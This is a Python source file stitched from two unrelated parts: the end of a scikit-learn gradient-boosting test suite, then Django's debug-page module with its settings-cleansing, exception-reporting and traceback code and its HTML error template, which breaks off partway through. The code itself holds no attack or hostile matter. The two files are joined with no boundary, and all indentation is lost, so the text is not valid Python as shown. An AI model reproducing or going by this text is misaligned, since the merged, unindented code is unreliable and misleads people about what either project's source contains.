for loss in ('huber', 'ls', 'lad', 'quantile'):
gb = GradientBoostingRegressor(learning_rate=1.0, n_estimators=2, loss=loss)
gb.fit(X, y, sample_weight=sample_weight)
assert_greater(gb.predict([[1, 0]])[0], 0.5)
def test_non_uniform_weights_toy_min_weight_leaf():
# Regression test for issue #4447
X = [[1, 0],
[1, 0],
[1, 0],
[0, 1],
]
y = [0, 0, 1, 0]
# ignore the first 2 training samples by setting their weight to 0
sample_weight = [0, 0, 1, 1]
gb = GradientBoostingRegressor(n_estimators=5, min_weight_fraction_leaf=0.1)
gb.fit(X, y, sample_weight=sample_weight)
assert_true(gb.predict([[1, 0]])[0] > 0.5)
assert_almost_equal(gb.estimators_[0, 0].splitter.min_weight_leaf, 0.2)
def test_non_uniform_weights_toy_edge_case_clf():
X = [[1, 0],
[1, 0],
[1, 0],
[0, 1]]
y = [0, 0, 1, 0]
# ignore the first 2 training samples by setting their weight to 0
sample_weight = [0, 0, 1, 1]
for loss in ('deviance', 'exponential'):
        gb = GradientBoostingClassifier(n_estimators=5, loss=loss)
gb.fit(X, y, sample_weight=sample_weight)
assert_array_equal(gb.predict([[1, 0]]), [1])
from __future__ import unicode_literals
import re
import sys
import types
from django.conf import settings
from django.core.urlresolvers import Resolver404, resolve
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotFound, build_request_repr,
)
from django.template import Context, Engine, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils import lru_cache, six, timezone
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as _
# Minimal Django templates engine to render the error templates
# regardless of the project's TEMPLATES setting.
DEBUG_ENGINE = Engine(debug=True)
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|SIGNATURE')
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
yield 0
p = template_source.find('\n')
while p >= 0:
yield p + 1
p = template_source.find('\n', p + 1)
yield len(template_source) + 1
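# Illustrative example (editorial addition, not part of Django): for the
# template source "ab\ncd\n", linebreak_iter yields 0, 3, 6 and finally 7
# (len(template_source) + 1), i.e. the offset at which each line starts plus
# a terminating sentinel.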
class CallableSettingWrapper(object):
""" Object to wrap callable appearing in settings
* Not to call in the debug page (#21345).
* Not to break the debug page if the callable forbidding to set attributes (#23070).
"""
def __init__(self, callable_setting):
self._wrapped = callable_setting
def __repr__(self):
return repr(self._wrapped)
def cleanse_setting(key, value):
"""Cleanse an individual setting key/value of sensitive content.
If the value is a dictionary, recursively cleanse the keys in
that dictionary.
"""
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = {k: cleanse_setting(k, v) for k, v in value.items()}
else:
cleansed = value
except TypeError:
# If the key isn't regex-able, just return as-is.
cleansed = value
if callable(cleansed):
# For fixing #21345 and #23070
cleansed = CallableSettingWrapper(cleansed)
return cleansed
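# Illustrative example (editorial addition, not part of Django): because
# 'SECRET_KEY' matches HIDDEN_SETTINGS, cleanse_setting('SECRET_KEY', 'abc')
# returns CLEANSED_SUBSTITUTE, while cleanse_setting('DEBUG', True) returns
# True unchanged; dictionary values are cleansed recursively, key by key.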
def get_safe_settings():
"Returns a dictionary of the settings module, with sensitive settings blurred out."
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb, status_code=500):
"""
Create a technical server error response. The last three arguments are
the values returned from sys.exc_info() and friends.
"""
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponse(text, status=status_code, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponse(html, status=status_code, content_type='text/html')
@lru_cache.lru_cache()
def get_default_exception_reporter_filter():
# Instantiate the default filter for the first time and cache it.
return import_string(settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
def get_exception_reporter_filter(request):
default_filter = get_default_exception_reporter_filter()
return getattr(request, 'exception_reporter_filter', default_filter)
class ExceptionReporterFilter(object):
"""
Base for all exception reporter filter classes. All overridable hooks
contain lenient default behaviors.
"""
def get_request_repr(self, request):
if request is None:
return repr(None)
else:
return build_request_repr(request, POST_override=self.get_post_parameters(request))
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(tb_frame.f_locals.items())
class SafeExceptionReporterFilter(ExceptionReporterFilter):
"""
Use annotations made by the sensitive_post_parameters and
sensitive_variables decorators to filter out sensitive information.
"""
def is_active(self, request):
"""
This filter is to add safety in production environments (i.e. DEBUG
is False). If DEBUG is True then your site is not safe anyway.
This hook is provided as a convenience to easily activate or
deactivate the filter on a per request basis.
"""
return settings.DEBUG is False
def get_cleansed_multivaluedict(self, request, multivaluedict):
"""
        Replaces the values of keys marked as sensitive in a MultiValueDict with stars.
This mitigates leaking sensitive POST parameters if something like
request.POST['nonexistent_key'] throws an exception (#21098).
"""
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
multivaluedict = multivaluedict.copy()
for param in sensitive_post_parameters:
if param in multivaluedict:
multivaluedict[param] = CLEANSED_SUBSTITUTE
return multivaluedict
def get_post_parameters(self, request):
"""
Replaces the values of POST parameters marked as sensitive with
stars (*********).
"""
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def cleanse_special_types(self, request, value):
try:
# If value is lazy or a complex object of another kind, this check
# might raise an exception. isinstance checks that lazy HttpRequests
# or MultiValueDicts will have a return value.
is_request = isinstance(value, HttpRequest)
except Exception as e:
return '{!r} while evaluating {!r}'.format(e, value)
if is_request:
# Cleanse the request's POST parameters.
value = self.get_request_repr(value)
elif isinstance(value, MultiValueDict):
# Cleanse MultiValueDicts (request.POST is the one we usually care about)
value = self.get_cleansed_multivaluedict(request, value)
return value
def get_traceback_frame_variables(self, request, tb_frame):
"""
Replaces the values of variables marked as sensitive with
stars (*********).
"""
# Loop through the frame's callers to see if the sensitive_variables
# decorator was used.
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in current_frame.f_locals):
# The sensitive_variables decorator was used, so we take note
# of the sensitive variables' names.
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
else:
value = self.cleanse_special_types(request, value)
cleansed[name] = value
else:
# Potentially cleanse the request and any MultiValueDicts if they
# are one of the frame variables.
for name, value in tb_frame.f_locals.items():
cleansed[name] = self.cleanse_special_types(request, value)
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in tb_frame.f_locals):
# For good measure, obfuscate the decorated function's arguments in
# the sensitive_variables decorator's frame, in case the variables
# associated with those arguments were meant to be obfuscated from
# the decorated function's frame.
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
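# Illustrative sketch (editorial addition, not part of Django): when the
# filter is active (DEBUG = False), a view such as
#
#     from django.views.decorators.debug import sensitive_variables
#
#     @sensitive_variables('password')
#     def my_view(request):
#         password = request.POST['password']
#         ...
#
# has its local variable ``password`` reported as CLEANSED_SUBSTITUTE by
# get_traceback_frame_variables() above, while its other locals are only run
# through cleanse_special_types().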
class ExceptionReporter(object):
"""
A class to organize and coordinate reporting on exceptions.
"""
def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = getattr(self.exc_value, 'template_debug', None)
self.template_does_not_exist = False
self.postmortem = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def get_traceback_data(self):
"""Return a dictionary containing traceback information."""
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
self.template_does_not_exist = True
self.postmortem = self.exc_value.chain or [self.exc_value]
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame_vars = []
for k, v in frame['vars']:
v = pprint(v)
                    # The force_escape filter assumes unicode; make sure that works.
if isinstance(v, six.binary_type):
v = v.decode('utf-8', 'replace') # don't choke on non-utf-8 input
# Trim large blobs of data
if len(v) > 4096:
v = '%s... <trimmed %d bytes string>' % (v[0:4096], len(v))
frame_vars.append((k, force_escape(v)))
frame['vars'] = frame_vars
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = smart_text(
unicode_str[max(start - 5, 0):min(end + 5, len(unicode_str))],
'ascii', errors='replace'
)
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST': self.filter.get_post_parameters(self.request),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': timezone.now(),
'django_version_info': get_version(),
'sys_path': sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'postmortem': self.postmortem,
}
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = smart_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
"Return HTML version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEMPLATE)
c = Context(self.get_traceback_data(), use_l10n=False)
return t.render(c)
def get_traceback_text(self):
"Return plain text version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEXT_TEMPLATE)
c = Context(self.get_traceback_data(), autoescape=False, use_l10n=False)
return t.render(c)
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
source = None
if loader is not None and hasattr(loader, "get_source"):
try:
source = loader.get_source(module_name)
except ImportError:
pass
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.read().splitlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = source[lower_bound:lineno]
context_line = source[lineno]
post_context = source[lineno + 1:upper_bound]
return lower_bound, pre_context, context_line, post_context
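    # Illustrative example (editorial addition, not part of Django): with
    # context_lines=7 and a zero-based lineno of 9, the bounds above become
    # lower_bound=2 and upper_bound=16, so pre_context is source[2:9],
    # context_line is source[9] and post_context is source[10:16];
    # get_traceback_frames() then converts these back to one-based numbers.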
def get_traceback_frames(self):
def explicit_or_implicit_cause(exc_value):
explicit = getattr(exc_value, '__cause__', None)
implicit = getattr(exc_value, '__context__', None)
return explicit or implicit
# Get the exception and all its causes
exceptions = []
exc_value = self.exc_value
while exc_value:
exceptions.append(exc_value)
exc_value = explicit_or_implicit_cause(exc_value)
frames = []
# No exceptions were supplied to ExceptionReporter
if not exceptions:
return frames
# In case there's just one exception (always in Python 2,
# sometimes in Python 3), take the traceback from self.tb (Python 2
# doesn't have a __traceback__ attribute on Exception)
exc_value = exceptions.pop()
tb = self.tb if six.PY2 or not exceptions else exc_value.__traceback__
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(
filename, lineno, 7, loader, module_name,
)
if pre_context_lineno is not None:
frames.append({
'exc_cause': explicit_or_implicit_cause(exc_value),
'exc_cause_explicit': getattr(exc_value, '__cause__', True),
'tb': tb,
'type': 'django' if module_name.startswith('django.') else 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
# If the traceback for current exception is consumed, try the
# other exception.
if six.PY2:
tb = tb.tb_next
elif not tb.tb_next and exceptions:
exc_value = exceptions.pop()
tb = exc_value.__traceback__
else:
tb = tb.tb_next
return frames
def format_exception(self):
"""
Return the same data as from traceback.format_exception.
"""
import traceback
frames = self.get_traceback_frames()
tb = [(f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames]
list = ['Traceback (most recent call last):\n']
list += traceback.format_list(tb)
list += traceback.format_exception_only(self.exc_type, self.exc_value)
return list
def technical_404_response(request, exception):
"Create a technical 404 error response. The exception should be the Http404."
try:
error_url = exception.args[0]['path']
except (IndexError, TypeError, KeyError):
error_url = request.path_info[1:] # Trim leading slash
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried # empty URLconf
or (request.path == '/'
and len(tried) == 1 # default URLconf
and len(tried[0]) == 1
and getattr(tried[0][0], 'app_name', '') == getattr(tried[0][0], 'namespace', '') == 'admin')):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
caller = ''
try:
resolver_match = resolve(request.path)
except Resolver404:
pass
else:
obj = resolver_match.func
if hasattr(obj, '__name__'):
caller = obj.__name__
elif hasattr(obj, '__class__') and hasattr(obj.__class__, '__name__'):
caller = obj.__class__.__name__
if hasattr(obj, '__module__'):
module = obj.__module__
caller = '%s.%s' % (module, caller)
t = DEBUG_ENGINE.from_string(TECHNICAL_404_TEMPLATE)
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': error_url,
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
'raising_view_name': caller,
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
"Create an empty URLconf 404 error response."
t = DEBUG_ENGINE.from_string(DEFAULT_URLCONF_TEMPLATE)
c = Context({
"title": _("Welcome to Django"),
"heading": _("It worked!"),
"subheading": _("Congratulations on your first Django-powered page."),
"instructions": _("Of course, you haven't actually done any work yet. "
"Next, start your first app by running <code>python manage.py startapp [app_label]</code>."),
"explanation": _("You're seeing this message because you have <code>DEBUG = True</code> in your "
"Django settings file and you haven't configured any URLs. Get to work!"),
})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = ("""
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; padding: 3px 2px; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 10px 20px; }
#template-not-exist .postmortem-section { margin-bottom: 3px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
.append-bottom { margin-bottom: 10px; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block': 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML == s1 ? s2: s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">"""
"""{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}"""
"""</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if postmortem %}
<p class="append-bottom">Django tried loading these templates, in this order:</p>
{% for entry in postmortem %}
<p class="postmortem-section">Using engine <code>{{ entry.backend.name }}</code>:</p>
<ul>
{% if entry.tried %}
{% for attempt in entry.tried %}
<li><code>{{ attempt.0.loader_name }}</code>: {{ attempt.0.name }} ({{ attempt.1 }})</li>
{% endfor %}
{% else %}
<li>This engine did not provide a list of tried templates.</li>
{% endif %}
</ul>
{% endfor %}
{% else %}
<p>No templates were found because your 'TEMPLATES' setting is not configured.</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}
{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>
{{ template_info.before }}
<span class="specific">{{ template_info.during }}</span>
{{ template_info.after }}
</td>
</tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">
Switch to copy-and-paste view</a></span>{% endif %}
</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}
<li><h3>
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
</h3></li>
{% endif %}{% endifchanged %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">
{% for line in frame.pre_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line">
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>
{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">
{% for line in frame.post_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title"
value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}
Traceback:{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}{% endif %}{% endifchanged %}
File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
